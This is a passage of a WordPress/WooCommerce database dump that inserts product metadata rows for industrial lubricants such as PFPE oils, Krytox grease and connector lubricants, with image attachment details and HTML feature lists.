INSERT INTO `wp_postmeta` VALUES (16244, 1662, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16245, 1662, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16246, 1662, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16247, 1662, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16248, 1662, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16249, 1662, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16250, 1662, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16251, 1662, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16252, 1662, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16253, 1662, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16254, 1662, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16255, 1662, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16256, 1662, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16257, 1662, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16258, 1662, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16259, 1662, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16260, 1662, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16261, 1662, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16262, 1662, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16263, 1662, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (16264, 1662, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (16265, 1664, '_edit_lock', '1480363314:2'); 
INSERT INTO `wp_postmeta` VALUES (16266, 1664, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16267, 1664, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16268, 1664, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16269, 1664, '_thumbnail_id', '1665'); 
INSERT INTO `wp_postmeta` VALUES (16270, 1664, '312_default_editor', '<ul>\r\n 	<li>Wide temperature range (-94ºF to 550ºF).</li>\r\n 	<li>Chemically inert.</li>\r\n 	<li>Insoluble in solvents, water, and steam.</li>\r\n 	<li>Compatible with plastics, metal and elastomers.</li>\r\n 	<li>Low outgassing.</li>\r\n 	<li>Low vapor pressure.</li>\r\n 	<li>Safe for use with reactive chemicals.</li>\r\n 	<li>Oxygen compatible</li>\r\n 	<li>Extends service life of critical components.</li>\r\n 	<li>Reduces friction &amp; wear.</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16271, 1664, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16272, 1664, '716_default_editor', '<ul>\r\n 	<li>Trolley System Chain Pins &amp; Wheels</li>\r\n 	<li>Conveyor Belt Chains</li>\r\n 	<li>Threads</li>\r\n 	<li>Bolts</li>\r\n 	<li>Bearings</li>\r\n 	<li>Hinges</li>\r\n 	<li>Moving Parts</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16273, 1664, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16274, 1664, '317_default_editor', '<ul>\r\n 	<li>4 oz</li>\r\n 	<li>8 oz</li>\r\n 	<li>Qt</li>\r\n 	<li>Gal</li>\r\n 	<li>5G</li>\r\n 	<li>55G</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16275, 1664, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16276, 1664, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16277, 1664, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16278, 1664, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16279, 1664, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16280, 1664, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16281, 1664, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16282, 1664, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16283, 1664, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16284, 1664, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16285, 1664, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16286, 1664, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16287, 1664, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16288, 1664, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16289, 1664, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16290, 1664, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16291, 1664, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16292, 1664, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16293, 1664, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16294, 1664, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16295, 1664, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16296, 1664, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (16297, 1664, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (16328, 1665, '_wp_attached_file', '2016/09/tribosys-110xnb-krytox-oil-grease.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16329, 1665, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1800;s:6:"height";i:2550;s:4:"file";s:45:"2016/09/tribosys-110xnb-krytox-oil-grease.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:45:"tribosys-110xnb-krytox-oil-grease-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:45:"tribosys-110xnb-krytox-oil-grease-565x800.jpg";s:5:"width";i:565;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:46:"tribosys-110xnb-krytox-oil-grease-768x1088.jpg";s:5:"width";i:768;s:6:"height";i:1088;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:47:"tribosys-110xnb-krytox-oil-grease-1129x1600.jpg";s:5:"width";i:1129;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:45:"tribosys-110xnb-krytox-oil-grease-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:45:"tribosys-110xnb-krytox-oil-grease-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:45:"tribosys-110xnb-krytox-oil-grease-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:45:"tribosys-110xnb-krytox-oil-grease-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:67;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16330, 1664, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16331, 1664, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16332, 1664, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16333, 1664, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16334, 1664, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16335, 1664, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16336, 1664, '_ywtm_content_tab_description', 'The PFPE Synthetic Oils, in addition to having a wide operating temperature range (-94°F to 550°F), are chemically inert, non-migrating, insoluble in hydrocarbons, water, steam, solvents, disinfectant, both acid and caustic types. They have low vapor pressure and low out-gassing characteristics. They are oxygen compatible, which makes it safe for oxygen service. Reduces friction and wear. Extends service life of critical components.'); 
INSERT INTO `wp_postmeta` VALUES (16337, 1666, '_edit_lock', '1480363370:2'); 
INSERT INTO `wp_postmeta` VALUES (16338, 1666, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (16339, 1666, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16340, 1666, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16341, 1666, '_thumbnail_id', '1667'); 
INSERT INTO `wp_postmeta` VALUES (16342, 1666, '312_default_editor', '<ul>\r\n 	<li>Wide temperature range (-94ºF to 550ºF).</li>\r\n 	<li>Chemically inert.</li>\r\n 	<li>Insoluble in solvents, water, and steam.</li>\r\n 	<li>Compatible with plastics, metal and elastomers.</li>\r\n 	<li>Low outgassing.</li>\r\n 	<li>Low vapor pressure.</li>\r\n 	<li>Safe for use with reactive chemicals.</li>\r\n 	<li>Oxygen compatible</li>\r\n 	<li>Extends service life of critical components.</li>\r\n 	<li>Reduces friction &amp; wear.</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16343, 1666, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16344, 1666, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n 	<li>Valves</li>\r\n 	<li>Hinges</li>\r\n 	<li>Threads</li>\r\n 	<li>Gears</li>\r\n 	<li>Bushings</li>\r\n 	<li>Seals</li>\r\n 	<li>Shafts</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16345, 1666, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16346, 1666, '317_default_editor', '<ul>\r\n 	<li>8 oz. Aerosol</li>\r\n 	<li>1- Aerosol</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16347, 1666, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16348, 1666, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16349, 1666, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16350, 1666, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16351, 1666, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16352, 1666, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16353, 1666, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16354, 1666, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16355, 1666, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16356, 1666, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16357, 1666, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16358, 1666, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16359, 1666, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16360, 1666, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16361, 1666, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16362, 1666, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16363, 1666, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16364, 1666, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16365, 1666, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16366, 1666, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16367, 1666, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16368, 1666, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (16369, 1666, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (16370, 1666, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16371, 1666, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16372, 1666, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16373, 1666, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16374, 1666, '_ywtm_content_tab_description', 'The PFPE Synthetic Oils, in addition to having a wide operating temperature range (-94°F to 550°F), are chemically inert, non-migrating, insoluble in hydrocarbons, water, steam, solvents, disinfectant, both acid and caustic types. They have low vapor pressure and low out-gassing characteristics. They are oxygen compatible, which makes it safe for oxygen service. Reduces friction and wear. Extends service life of critical components.'); 
INSERT INTO `wp_postmeta` VALUES (16400, 1666, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16401, 1666, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16402, 1667, '_wp_attached_file', '2016/09/tribosys-120x-krytox-grease-aerosol.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16403, 1667, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:47:"2016/09/tribosys-120x-krytox-grease-aerosol.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:47:"tribosys-120x-krytox-grease-aerosol-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:47:"tribosys-120x-krytox-grease-aerosol-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:47:"tribosys-120x-krytox-grease-aerosol-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:49:"tribosys-120x-krytox-grease-aerosol-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:47:"tribosys-120x-krytox-grease-aerosol-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:47:"tribosys-120x-krytox-grease-aerosol-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:47:"tribosys-120x-krytox-grease-aerosol-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:47:"tribosys-120x-krytox-grease-aerosol-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16404, 1668, '_edit_lock', '1499358435:3'); 
INSERT INTO `wp_postmeta` VALUES (16405, 1668, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (16406, 1669, '_wp_attached_file', '2016/09/connector-lubricant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (16407, 1669, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4196;s:6:"height";i:2800;s:4:"file";s:31:"2016/09/connector-lubricant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"connector-lubricant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"connector-lubricant-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"connector-lubricant-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:33:"connector-lubricant-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"connector-lubricant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"connector-lubricant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"connector-lubricant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"connector-lubricant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (16408, 1668, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16409, 1668, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16410, 1668, '_thumbnail_id', '4659'); 
INSERT INTO `wp_postmeta` VALUES (16411, 1668, '312_default_editor', '<ul>\r\n 	<li>Cleans, lubricates and protects multi-pin connectors</li>\r\n 	<li>Reduces insertion forces</li>\r\n 	<li>Greatly increases mating cycles (especially important where high pin counts are involved)</li>\r\n 	<li>Extends connector life by preventing corrosion and galling</li>\r\n 	<li>Removes contaminates and oxides.</li>\r\n 	<li>Is non-migrating-contains no silicones.</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li>Available with an UV (ultraviolet) indicator</li>\r\n 	<li>No interference in electrical continuity</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>NSN 6850-01-519-8521 (MS-381H)</li>\r\n 	<li>NSN-6850-01-538-3496 (MS-383H)</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16412, 1668, '1367_default_editor', '<strong>MS-381HC </strong>(16 oz Aerosol)\r\n<strong>MS-381HCM </strong>(8 oz Aerosol)\r\n<strong>MS-383H </strong>(1 oz, 4 oz, 8 oz, Qt, Gal, 5G, 55G)'); 
INSERT INTO `wp_postmeta` VALUES (16413, 1668, '716_default_editor', '<ul>\r\n 	<li>Connectors</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16414, 1668, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16415, 1668, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16416, 1668, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16417, 1668, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (16418, 1668, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16419, 1668, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16420, 1668, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16421, 1668, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16422, 1668, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16423, 1668, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16424, 1668, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16425, 1668, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16426, 1668, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (16427, 1668, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16428, 1668, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16429, 1668, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16430, 1668, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16431, 1668, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16432, 1668, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16433, 1668, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16434, 1668, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16435, 1668, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16436, 1668, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16437, 1668, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16438, 1668, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16439, 1668, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (16440, 1668, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16441, 1668, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16442, 1668, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16443, 1668, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16444, 1668, '_ywtm_content_tab_description', 'Cleans, lubricates and protects multi-pin connectors. Reduces insertion force, greatly increasing connection cycles. Extends connector life by preventing corrosion and galling. Contains a 6-ring polyphenyl ether lubricant which provides long-lasting protection against oxidation. No interference with electrical continuity. Thermal stability to 836°F/447°C. This 6-ring PPE can provide a 20-year film life where temperatures do not exceed 230°F/110°C. Contains no silicones and is non-migrating. Available with an ultraviolet (UV) indicator. Nonflammable. No ODC (ozone depleting chemicals). Custom packaging available. NSN 6850-01-538-3496 (Qt).'); 
INSERT INTO `wp_postmeta` VALUES (16445, 1668, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (16446, 1670, '_edit_lock', '1499358658:3'); 
INSERT INTO `wp_postmeta` VALUES (16447, 1670, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (16448, 1670, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (16449, 1670, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (16450, 1670, '_thumbnail_id', '4660'); 
INSERT INTO `wp_postmeta` VALUES (16451, 1670, '312_default_editor', '<ul>\r\n 	<li>Cleans, lubricates and protects multi-pin connectors</li>\r\n 	<li>Reduces insertion forces</li>\r\n 	<li>Greatly increases mating cycles (especially important where high pin counts are involved)</li>\r\n 	<li>Extends connector life by preventing corrosion and galling</li>\r\n 	<li>Removes contaminates and oxides.</li>\r\n 	<li>Is non-migrating-contains no silicones.</li>\r\n 	<li>Non ozone depleting</li>\r\n 	<li>Available with an UV (ultraviolet) indicator</li>\r\n 	<li>No interference in electrical continuity</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>NSN 6850-01-519-8521 (MS-381H)</li>\r\n 	<li>NSN-6850-01-538-3496 (MS-383H)</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16452, 1670, '1367_default_editor', '<strong>MS-381H </strong>(16 oz Aerosol)\r\n<strong>MS-381HM </strong>(8 oz Aerosol)'); 
INSERT INTO `wp_postmeta` VALUES (16453, 1670, '716_default_editor', '<ul>\r\n 	<li>Connectors</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (16454, 1670, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16455, 1670, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (16456, 1670, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (16457, 1670, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16458, 1670, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16459, 1670, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (16460, 1670, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16461, 1670, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (16462, 1670, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (16463, 1670, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (16464, 1670, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (16465, 1670, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16466, 1670, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16467, 1670, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16468, 1670, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (16469, 1670, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (16470, 1670, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (16471, 1670, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (16472, 1670, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16473, 1670, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16474, 1670, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (16475, 1670, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16476, 1670, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (16477, 1670, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (16478, 1670, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16479, 1670, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (16480, 1670, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (16481, 1670, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (16482, 1670, '_ywtm_content_tab_description', 'Cleans, lubricates and protects multi-pin connectors. Reduces insertion force, greatly increasing connection cycles. Extends connector life by preventing corrosion and galling. Contains a 6-ring polyphenyl ether lubricant which provides long-lasting protection against oxidation. No interference with electrical continuity. Thermal stability to 836°F/447°C. This 6-ring PPE can provide a 20-year film life where temperatures do not exceed 230°F/110°C. Contains no silicones and is non-migrating. Available with an ultraviolet (UV) indicator. Nonflammable. No ODC (ozone depleting chemicals). Custom packaging available. NSN 6850-01-538-3496 (Qt).'); 
INSERT INTO `wp_postmeta` VALUES (16483, 1670, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (16509, 1671, '_wp_attached_file', '2016/09/connector-lubricant-2.jpg'); 
